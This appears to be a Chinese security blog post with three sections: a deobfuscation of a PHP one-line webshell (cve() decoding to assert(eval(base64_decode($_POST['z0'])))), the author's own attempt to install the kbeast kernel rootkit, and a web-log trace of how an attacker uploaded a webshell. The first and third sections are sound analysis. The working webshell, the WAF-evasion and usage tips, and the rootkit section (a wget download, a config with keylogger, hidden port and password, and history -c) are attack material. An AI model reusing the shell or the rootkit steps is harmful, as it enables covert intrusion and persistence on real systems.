Analysis of a one-line trojan found in a "parasite" infection

Recently a friend's site kept getting infected with malicious code, and the place where the "parasite" script was planted has not yet been found. It seems they were in a hurry to deal with it and cleaned the parasite out without keeping a backup. I had seen one once before without analysing it; it also went through all kinds of indirection. Inside it I found a one-line trojan that is genuinely odd. The source is as follows:

<?php
function cve($str,$key)
{
$t="";
for($i=0; $i<strlen($str); $i=$i+2)
{
    $k=(($i+2)/2)%strlen($key);
    $p=substr($key, $k,1);
    if(is_numeric(substr($str, $i,1)))
    {
        $t=$t.chr(hexdec(substr($str, $i,2))-$p);
    }
    else
    {
        $t=$t.chr(hexdec(substr($str, $i,4)));
        $i=$i+2;
    }
}
return($t);
}

(@$_=cve('6A767C687B77','39')).@$_(cve('6776666E286763736A38346466656871646A2A2464524F58565B2C7C302C5F292E','520'));
?>

There are only algorithms nobody has thought of yet, never one-liners that cannot be built. There must be several hundred mutated one-liners by now; mixed together there are probably over a thousand variants, of which perhaps a few hundred are core ones. I debugged how this one-liner works, as follows:

<?php
function cve($str,$key)
{
$t="";
echo $str.">>".$key."<br>";
for($i=0; $i<strlen($str); $i=$i+2)
{   echo $i." while ";//loop counter
    $k=(($i+2)/2)%strlen($key);
    echo " ---- ".$k; //$k for this pass after the expression above: ((i+2)/2) % strlen(key)
    $p=substr($key, $k,1); //take 1 character of $key starting at offset $k
    echo " ---- ".$p; //
    if(is_numeric(substr($str, $i,1)))//if the character of $str at position $i is a digit
    {
        $t=$t.chr(hexdec(substr($str, $i,2))-$p);
        echo $t." >>>>>>yes int"."<br>";//take 2 characters of $str from $i, convert from hex to decimal, subtract $p, then map the result to its ASCII character with chr()
    }
    else
    {
        $t=$t.chr(hexdec(substr($str, $i,4)));
        $i=$i+2;
        echo $t." >>>>>>is no int"."<br>";//if the test above is not a digit we come here; same as above except 4 characters are taken from $i and $i is advanced by 2 more, so each pass through this branch consumes 4 characters
    }
}
echo $t." >>>>>>return>>>>>>".$t."<br>";
return($t);
}

(@$_=cve('6A767C687B77','39')).@$_(cve('6776666E286763736A38346466656871646A2A2464524F58565B2C7C302C5F292E','520'));
//(@$_=assert).@$_(eval(base64_decode($_POST['z0']))); //first decoding
//assert(eval(base64_decode($_POST['z0']))); //second decoding

//so it is a base64-encoded variant shell
echo "<br>".base64_encode("phpinfo();")."<br>"; //cGhwaW5mbygpOw==
//a POST request with z0=cGhwaW5mbygpOw== is enough to use this trojan
//the user of this trojan probably relays the base64-encoded payload through a jump host; that hides the hop, and the base64 encoding is there to get past the WAF
?>

Running it gives the following output:

6A767C687B77>>39
0 while ---- 1 ---- 9a >>>>>>yes int
2 while ---- 0 ---- 3as >>>>>>yes int
4 while ---- 1 ---- 9ass >>>>>>yes int
6 while ---- 0 ---- 3asse >>>>>>yes int
8 while ---- 1 ---- 9asser >>>>>>yes int
10 while ---- 0 ---- 3assert >>>>>>yes int
assert >>>>>>return>>>>>>assert
6776666E286763736A38346466656871646A2A2464524F58565B2C7C302C5F292E>>520
0 while ---- 1 ---- 2e >>>>>>yes int
2 while ---- 2 ---- 0ev >>>>>>yes int
4 while ---- 0 ---- 5eva >>>>>>yes int
6 while ---- 1 ---- 2eval >>>>>>yes int
8 while ---- 2 ---- 0eval( >>>>>>yes int
10 while ---- 0 ---- 5eval(b >>>>>>yes int
12 while ---- 1 ---- 2eval(ba >>>>>>yes int
14 while ---- 2 ---- 0eval(bas >>>>>>yes int
16 while ---- 0 ---- 5eval(base >>>>>>yes int
18 while ---- 1 ---- 2eval(base6 >>>>>>yes int
20 while ---- 2 ---- 0eval(base64 >>>>>>yes int
22 while ---- 0 ---- 5eval(base64_ >>>>>>yes int
24 while ---- 1 ---- 2eval(base64_d >>>>>>yes int
26 while ---- 2 ---- 0eval(base64_de >>>>>>yes int
28 while ---- 0 ---- 5eval(base64_dec >>>>>>yes int
30 while ---- 1 ---- 2eval(base64_deco >>>>>>yes int
32 while ---- 2 ---- 0eval(base64_decod >>>>>>yes int
34 while ---- 0 ---- 5eval(base64_decode >>>>>>yes int
36 while ---- 1 ---- 2eval(base64_decode( >>>>>>yes int
38 while ---- 2 ---- 0eval(base64_decode($ >>>>>>yes int
40 while ---- 0 ---- 5eval(base64_decode($_ >>>>>>yes int
42 while ---- 1 ---- 2eval(base64_decode($_P >>>>>>yes int
44 while ---- 2 ---- 0eval(base64_decode($_PO >>>>>>yes int
46 while ---- 0 ---- 5eval(base64_decode($_POS >>>>>>yes int
48 while ---- 1 ---- 2eval(base64_decode($_POST >>>>>>yes int
50 while ---- 2 ---- 0eval(base64_decode($_POST[ >>>>>>yes int
52 while ---- 0 ---- 5eval(base64_decode($_POST[' >>>>>>yes int
54 while ---- 1 ---- 2eval(base64_decode($_POST['z >>>>>>yes int
56 while ---- 2 ---- 0eval(base64_decode($_POST['z0 >>>>>>yes int
58 while ---- 0 ---- 5eval(base64_decode($_POST['z0' >>>>>>yes int
60 while ---- 1 ---- 2eval(base64_decode($_POST['z0'] >>>>>>yes int
62 while ---- 2 ---- 0eval(base64_decode($_POST['z0']) >>>>>>yes int
64 while ---- 0 ---- 5eval(base64_decode($_POST['z0'])) >>>>>>yes int
eval(base64_decode($_POST['z0'])) >>>>>>return>>>>>>eval(base64_decode($_POST['z0']))

Damn, this algorithm, how did they come up with it? Swap in another function and yet another variant is born. At least Safedog (安全狗) can detect this one; Alibaba Cloud's Yundun cannot, it does not find it at all...
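As an added example (my own Python, not code from the post), here is a port of the cve() routine so an analyst can decode strings of this kind offline, without executing the PHP, together with a small helper that pulls every cve('…','…') call out of a sample and reports what it decodes to and whether the plaintext names a code-execution function. The function name cve and the argument layout are those of this sample; other variants rename the function, so the regular expression is an assumption to adjust per sample. The input used is the obfuscated line quoted above.

```python
import re

# Function names whose appearance after decoding marks the sample as a code-execution shell.
RISKY = {"eval", "assert", "system", "exec", "shell_exec", "passthru", "create_function"}


def cve_decode(hexstr, key):
    """Python port of the sample's cve($str, $key) routine, used here only for decoding.

    Walks the hex string two characters at a time.  If the lead character is a
    digit (PHP is_numeric() on one character), two hex digits are taken and the
    key digit at ((i+2)/2) % len(key) is subtracted before chr(); otherwise four
    hex digits are taken unchanged and the index skips ahead by four.
    """
    out = []
    i = 0
    while i < len(hexstr):
        k = ((i + 2) // 2) % len(key)
        p = int(key[k])
        if hexstr[i].isdigit():
            out.append(chr(int(hexstr[i:i + 2], 16) - p))
            i += 2
        else:
            out.append(chr(int(hexstr[i:i + 4], 16)))
            i += 4
    return "".join(out)


# Matches cve('HEX', 'KEY') calls as they appear in this sample.  Assumption: other
# variants rename the function; change the name here when triaging those.
CALL_RE = re.compile(r"cve\(\s*'([0-9A-Fa-f]+)'\s*,\s*'(\d+)'\s*\)")


def decode_sample(src):
    """Return [(hex, key, plaintext, risky)] for every cve() call found in src."""
    results = []
    for hexstr, key in CALL_RE.findall(src):
        plain = cve_decode(hexstr, key)
        risky = any(name in plain for name in RISKY)
        results.append((hexstr, key, plain, risky))
    return results


# The obfuscated line quoted in the post, used as the input to decode.
SAMPLE = ("(@$_=cve('6A767C687B77','39')).@$_(cve('6776666E286763736A38346466656871646A"
          "2A2464524F58565B2C7C302C5F292E','520'));")

if __name__ == "__main__":
    for hexstr, key, plain, risky in decode_sample(SAMPLE):
        print(f"{'RISKY ' if risky else '      '}cve('{hexstr}','{key}') -> {plain!r}")
```

Decoding statically rather than running the PHP with echo statements has one practical advantage during incident response: the sample never executes, so a variant whose second argument happens to be something other than a base64 wrapper cannot do anything while being inspected.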

Notes on trying out a rootkit variant

A reverse shell is often inconvenient: you need a public IP, or control of a router to set up port mapping, and a home IP is not stable. Without router access you can hardly resort to ARP spoofing; with it you can use Oray (花生壳) for the mapping. None of these is a perfect solution. Writing a backdoor directly, with no reverse connection needed, is better. With a reverse shell you may have the privileges to add an account, which is worth trying; if not, all you can do is maintain a backdoor. I heard rootkits are especially powerful, so I spent some time looking into them. The write-ups online are not detailed, and in practice the chance of success is small.

I started with kbeast. The parameter descriptions online were incomplete, so here is a fuller version:
First download, extract, enter the directory and edit the config file:
wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
tar zxvf ipsecs-kbeast-v1.tar.gz
cd kbeast-v1/
vim config.h

#the keylogger may be unstable; enabling it is recommended
define _KEYLOG_ TRUE

#name of the daemon process
define KBEAST "sheller"

#program path, to prevent accidental deletion or detection
define _H4X_PATH_ "/usr/rootkit"

#logs are saved under this path; the _h4x_ path must be used
define _H4X_PATH_ "/usr/_h4x_"

#the log file produced here is hidden
define _LOGFILE_ "access_log"

#listening port; netstat cannot see it, but an external nmap scan can
define _HIDE_PORT_ 55555

#configure username and password
define _RPASSWORD_ "hacker"
define _MAGIC_NAME_ "root" #the user must have bash access

Then install: ./setup build fails with Compiling Kernel Module : [NOT OK]. I tried installing kernel-headers, kernel and kernel-dev; none worked, it keeps throwing Checking for Kernel Header : [NOT OK] - Please Install!
Checking showed the headers were fine: echo linux-headers-$(uname -r)
My kernel, from uname -r, is 2.6.18; apparently the module cannot be loaded into it. kbeast is a kernel-level rootkit.
Then history -c, and I found suterusu: https://github.com/mncoppola/suterusu; compiling that failed as well;
After that, since the kernel route was not working, I tried an application-level tool first and went looking for the well-known domestic Sunlogin (向日葵). The download was nothing but compiled .so libraries, without the run.sh the docs mention, and the desktop remote-control client from the official site would not even open, so I gave up on that for now. I will keep using a script-based reverse shell and keep an eye out for rootkits.
The first one, kbeast, probably still works on some Linux systems: it can be loaded into the kernel and then connected to with nc or telnet.

Tracing a compromise back through the web logs

A customer's website had a backdoor at /home/wwwroot/default/Public/Uploadify/demo.php; demo.php is a typical one-line webshell. How was it uploaded? There are many possibilities. It could have been a system vulnerability with privilege escalation, but in that case the attacker would simply have used a rootkit rather than leaving a one-liner, so that idea is ruled out first. Otherwise it was a web vulnerability such as a weak password or an upload flaw, which is the most likely. Finding that vulnerability by pentesting would take a lot of time and effort; the alternative is to trace it back through the logs. In theory the cause can always be found that way, though sometimes it cannot, or the trail is complicated and has to be found indirectly. This time I chose log back-tracing to find how the webshell was written.

I downloaded the last 30 days of access.log. The webshell's file timestamp is only a hint, since file times can be modified, so it cannot be relied on. I first looked at the last week of logs and found nothing; with the last month of logs things started to make sense.

//searching the log for demo.php gives 35 hits, all containing demo.php

138.128.212.179 - - [16/Jul/2016:00:23:00 +0800] "GET /Public/js/demo.php HTTP/1.1" 404 791 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"

//this shows the actual webshell path is a different one; continue to the next demo.php entry

138.128.212.179 - - [16/Jul/2016:00:21:06 +0800] "POST /Public/Uploadify/demo.php HTTP/1.1" 404 1331 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"

//found it. This entry is the attacker accessing the webshell, but it returns 404, so the file does not exist at this point; probably the attacker testing whether the webshell was written successfully.

//searching again for demo.php HTTP/1.1" 200, i.e. entries from when the webshell had not yet been deleted, gives 21 hits; follow the attacker's trail by IP (IP: 138.128.212.179)
138.128.212.179 - - [12/Jul/2016:19:02:18 +0800] "GET /Public/uploadify.php HTTP/1.1" 404 791 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0" //Public/uploadify.php does not exist: 404
138.128.212.179 - - [12/Jul/2016:19:02:22 +0800] "GET /Public/uploadf.php HTTP/1.1" 200 13 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0" //Public/uploadf.php exists: 200
138.128.212.179 - - [12/Jul/2016:19:02:26 +0800] "GET /Public/ HTTP/1.1" 403 273 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [12/Jul/2016:19:02:31 +0800] "GET /Uploads/ HTTP/1.1" 403 274 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [12/Jul/2016:19:02:36 +0800] "GET /Uploads/Pic/ HTTP/1.1" 404 791 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [12/Jul/2016:19:02:39 +0800] "GET /Uploads/ HTTP/1.1" 403 274 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [12/Jul/2016:19:02:41 +0800] "GET / HTTP/1.1" 302 3 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [12/Jul/2016:19:02:41 +0800] "GET /home/index/home.html HTTP/1.1" 302 3 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [12/Jul/2016:19:02:42 +0800] "GET /home/login/index.html HTTP/1.1" 200 1306 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"

//it looks like the upload file /Public/uploadify.php has been found; the attacker is looking for the upload directory;

138.128.212.179 - - [14/Jul/2016:18:41:14 +0800] "GET / HTTP/1.1" 302 3 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:16 +0800] "GET /home/index/home.html HTTP/1.1" 302 3 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:16 +0800] "GET /home/login/index.html HTTP/1.1" 200 1306 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:18 +0800] "GET / HTTP/1.1" 302 3 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:19 +0800] "GET /home/index/home.html HTTP/1.1" 302 3 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:21 +0800] "GET /home/login/index.html HTTP/1.1" 200 1306 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:21 +0800] "GET /1.log HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:23 +0800] "GET /public/upimg.htm?and+1=1+and+"=' HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:23 +0800] "GET /public/upimg.htm HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:24 +0800] "GET /Public/upimg.htm HTTP/1.1" 200 744 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:24 +0800] "GET /public/uploadify.php HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:25 +0800] "GET /thisistest.txt HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:28 +0800] "GET /Public/uploadify.php HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:28 +0800] "GET /thisistest.txt HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:31 +0800] "GET /ajax.php HTTP/1.1" 200 54 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:32 +0800] "GET /Home/Login/loginadmin HTTP/1.1" 200 948 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:32 +0800] "GET /phpMyAdmin/ HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:34 +0800] "GET /pm/ HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:35 +0800] "GET /phpinfo.php HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:35 +0800] "GET /Bak_data/ HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:36 +0800] "GET /thisistest.txt HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:36 +0800] "GET /Public/UEditor/ueditor.all.js HTTP/1.1" 404 162 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:36 +0800] "GET /Data/ HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:37 +0800] "GET /db/ HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:37 +0800] "GET /Db/ HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:38 +0800] "GET /iProber.php HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:38 +0800] "GET /Public/3mz.php HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:39 +0800] "GET /thisistest.txt HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:39 +0800] "GET /Public/main1.php HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:40 +0800] "GET /thisistest.txt HTTP/1.1" 404 791 "-" "python-requests/2.10.0"

//the entries above are the attacker scanning with a Python script; nothing sensitive appears to have been found

138.128.212.179 - - [14/Jul/2016:18:52:21 +0800] "GET /User/Runtime/Logs/Home/16_07_14.log HTTP/1.1" 200 535770 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"

//this entry is useful: when ThinkPHP has debug mode turned on and logging enabled, it creates log files in this directory by default, named year_month_day, and they can be downloaded. Here the attacker has already downloaded them. I downloaded one and looked at it: it is an error log.

138.128.212.179 - - [14/Jul/2016:18:52:50 +0800] "GET /User/Runtime/Logs/Home/16_07_13.log HTTP/1.1" 200 429903 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:52:58 +0800] "GET /User/Runtime/Logs/Home/16_07_12.log HTTP/1.1" 200 27181 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:53:05 +0800] "GET /User/Runtime/Logs/Home/16_07_11.log HTTP/1.1" 200 452102 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:53:20 +0800] "GET /User/Runtime/Logs/Home/16_07_10.log HTTP/1.1" 200 431381 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:54:56 +0800] "GET /User/Runtime/Logs/Home/16_07_09.log HTTP/1.1" 200 433395 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:55:16 +0800] "GET /User/Runtime/Logs/Home/16_07_08.log HTTP/1.1" 200 462788 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:55:23 +0800] "GET /User/Runtime/Logs/Home/16_07_07.log HTTP/1.1" 200 433154 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:55:27 +0800] "GET /User/Runtime/Logs/Home/16_07_06.log HTTP/1.1" 200 441394 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:55:30 +0800] "GET /User/Runtime/Logs/Home/16_07_05.log HTTP/1.1" 200 459486 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:55:46 +0800] "GET /User/Runtime/Logs/Home/16_07_04.log HTTP/1.1" 200 664894 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:57:04 +0800] "GET /User/Runtime/Logs/Home/16_07_03.log HTTP/1.1" 200 1438415 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:58:04 +0800] "GET /User/Runtime/Logs/Home/16_07_02.log HTTP/1.1" 200 1966718 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:58:31 +0800] "GET /User/Runtime/Logs/Home/16_07_01.log HTTP/1.1" 200 428610 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:58:36 +0800] "GET /User/Runtime/Logs/Home/16_06_30.log HTTP/1.1" 200 522384 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:58:37 +0800] "GET /User/Runtime/Logs/Home/16_06_29.log HTTP/1.1" 200 77195 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:58:38 +0800] "GET /User/Runtime/Logs/Home/16_06_28.log HTTP/1.1" 404 1331 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:58:38 +0800] "GET /User/Runtime/Logs/Home/16_06_27.log HTTP/1.1" 404 1331 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:58:39 +0800] "GET /User/Runtime/Logs/Home/16_06_26.log HTTP/1.1" 404 1331 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [14/Jul/2016:18:58:39 +0800] "GET /User/Runtime/Logs/Home/16_06_25.log HTTP/1.1" 404 1331 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [15/Jul/2016:01:02:53 +0800] "GET / HTTP/1.1" 302 3 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:02:54 +0800] "GET /home/index/home.html HTTP/1.1" 302 3 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:02:55 +0800] "GET /home/login/index.html HTTP/1.1" 200 1306 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:02:55 +0800] "GET / HTTP/1.1" 302 3 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:02:55 +0800] "GET /home/index/home.html HTTP/1.1" 302 3 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:02:56 +0800] "GET /home/login/index.html HTTP/1.1" 200 1306 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:02:56 +0800] "GET /1.log HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:02:57 +0800] "GET /public/upimg.htm?and+1=1+and+"=' HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:02:57 +0800] "GET /public/upimg.htm HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:02:58 +0800] "GET /Public/upimg.htm HTTP/1.1" 200 744 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:02:58 +0800] "GET /public/uploadify.php HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:02:58 +0800] "GET /thisistest.txt HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:02:59 +0800] "GET /Public/uploadify.php HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:02:59 +0800] "GET /thisistest.txt HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:03:00 +0800] "GET /ajax.php HTTP/1.1" 200 54 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:03:00 +0800] "GET /Home/Login/loginadmin HTTP/1.1" 200 948 "-" "python-requests/2.10.0"
223.104.91.228 - - [15/Jul/2016:01:03:00 +0800] "POST /Home/Index/tgbzcl HTTP/1.1" 200 86 "http://www.slbvip.com/Home/Index/home1" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/13F69 UCBrowser/10.9.15.793 Mobile"
138.128.212.179 - - [15/Jul/2016:01:03:01 +0800] "GET /phpMyAdmin/ HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:03:01 +0800] "GET /pm/ HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:03:02 +0800] "GET /phpinfo.php HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [15/Jul/2016:01:03:02 +0800] "GET /Bak_data/ HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
//up to here it is all the Python script scanning; only the error logs were found, nothing else of use;

138.128.212.179 - - [15/Jul/2016:17:21:34 +0800] "GET /favicon.ico HTTP/1.1" 404 791 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [15/Jul/2016:17:21:55 +0800] "POST /Home/Common/uploadFace HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [15/Jul/2016:17:22:25 +0800] "POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1" 200 51 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:22:25 +0800] "POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1" 200 119 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:22:27 +0800] "POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1" 200 115 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:22:33 +0800] "POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1" 200 1526 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:22:36 +0800] "POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1" 200 112 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:22:45 +0800] "POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1" 200 1037 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:23:00 +0800] "GET /Public/uploadifiy.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [15/Jul/2016:17:23:21 +0800] "POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1" 200 748 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:23:25 +0800] "POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1" 200 420 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:23:26 +0800] "POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1" 200 250 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:23:34 +0800] "POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1" 200 7 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:23:35 +0800] "POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1" 200 290 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:23:41 +0800] "POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1" 200 7 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:23:48 +0800] "POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1" 200 7 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
